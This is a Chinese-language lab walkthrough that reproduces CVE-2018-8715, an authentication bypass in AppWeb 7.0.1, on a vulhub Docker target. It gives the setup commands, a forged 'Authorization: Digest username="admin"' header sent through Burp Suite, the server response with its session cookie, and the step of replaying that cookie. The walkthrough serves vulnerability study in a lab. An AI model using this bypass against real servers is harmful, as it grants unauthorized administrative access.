准备:
环境:vulhub靶场 ip:192.168.3.74
工具:burpsuite
启动环境:
┌──(root㉿kali)-[~/Desktop/vulhub]
└─# cd appweb
┌──(root㉿kali)-[~/Desktop/vulhub/appweb]
└─# ls
CVE-2018-8715
┌──(root㉿kali)-[~/Desktop/vulhub/appweb]
└─# cd CVE-2018-8715
┌──(root㉿kali)-[~/Desktop/vulhub/appweb/CVE-2018-8715]
└─# docker-compose up -d
Creating network "cve-2018-8715_default" with the default driver
Pulling web (vulhub/appweb:7.0.1)...
7.0.1: Pulling from vulhub/appweb
419e7ae5bb1e: Pull complete
848839e0cd3b: Pull complete
de30e8b35015: Pull complete
2e66baab3c26: Pull complete
9a1adbcb76ed: Pull complete
Digest: sha256:f7dbbe93bb427774c89d55e9dca3343a15c906ef82386b693edaca7c0c922330
Status: Downloaded newer image for vulhub/appweb:7.0.1
Creating cve-2018-8715_web_1 ... done
复现过程
访问http://your-ip:8080
设置代理和打开burpsuite
用户名输入admin,密码留空直接登录,抓包
将抓到的包调到Request模块
将Authorization字段的参数改成如以下
Authorization: Digest username="admin"
然后点击go,得到回复包
HTTP/1.1 200 OK
Set-Cookie: -http-session-=1::http.session::3cb69e5b65d0b8590d2888ad1dab945b; path=/; domain=192.168.3.74; httponly
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
Content-Type: text/html
X-Content-Type-Options: nosniff
Date: Wed, 20 Jul 2022 09:08:56 GMT
ETag: 1599442887
Cache-Control: no-cache="set-cookie"
Content-Length: 3322
X-XSS-Protection: 1; mode=block
Last-Modified: Mon, 10 Aug 2020 17:10:05 GMT
Connection: close
Accept-Ranges: bytes
将Set-Cookie的参数复制到Authorization的参数后面并放回包
返回浏览器检查,认证绕过成功